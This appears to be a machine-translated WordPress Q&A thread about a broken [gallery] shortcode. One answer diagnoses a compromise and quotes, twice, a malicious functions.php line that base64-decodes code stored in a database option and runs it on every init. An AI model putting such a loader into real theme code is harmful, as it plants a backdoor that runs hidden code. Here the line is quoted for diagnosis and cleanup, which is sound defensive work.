默认Wordpress [图库]未显示在自定义主题中

Question

一切都很好，直到最近的更新。 [gallery]不再显示图像了，它看起来也没有包含在代码中。

这是页面的循环：

<?php
    // Start the loop.
    while ( have_posts() ) : the_post();?>
        <article id="post-<?php the_ID(); ?>" <?php post_class(); ?> role="article">
            <h1 class="entry-title"><?php the_title(); ?></h1>
                <div class="entry-content">
                    <?php the_content(); ?>
                </div><!-- .entry-content -->
        </article><!-- #post-<?php the_ID(); ?> -->
<?php   
    // End the loop.
    endwhile;
?>

来自the_content的文本内容正在显示，但内容中的[gallery]未显示或呈现为代码（因此问题不应出现在javascript中）。

这里是functions.php文件： http ： //pastebin.com/vfJpphgt （是的，我已添加了图库的主题支持，但没有更改）

Answer 1

尝试安装插件NextGEN Gallery，添加图库图片，并尝试在主页上显示，

https://wordpress.org/plugins/nextgen-gallery/

Answer 2

你的网站被黑了。

pastebin的最后一行是从数据库加载恶意代码： add_action('init', create_function('', implode("\\n", array_map("base64_decode", unserialize(get_option("wptheme_opt")))))); ?> add_action('init', create_function('', implode("\\n", array_map("base64_decode", unserialize(get_option("wptheme_opt")))))); ?>

执行的代码将搞乱WPQuery以检索您的Gallery媒体文件。 这就是[gallery]被打破的原因。 （事实上​​，你可以幸运地获得这一部分。）

你可以在sucuri.net找到关于这个恶意软件的条目 。 您应检查服务器上的所有文件是否存在可疑行。 虽然最可能的攻击途径是通过WordPress漏洞，但您应该在WordPress和服务器上更改所有密码。

删除恶意软件后，您可以使用Wordfence等工具清理WordPress（我与插件或其作者没有任何关联）。

Answer 3

你在控制台看到任何javascript错误？ 什么是输出

<?php echo do_shortcode('[gallery]');?>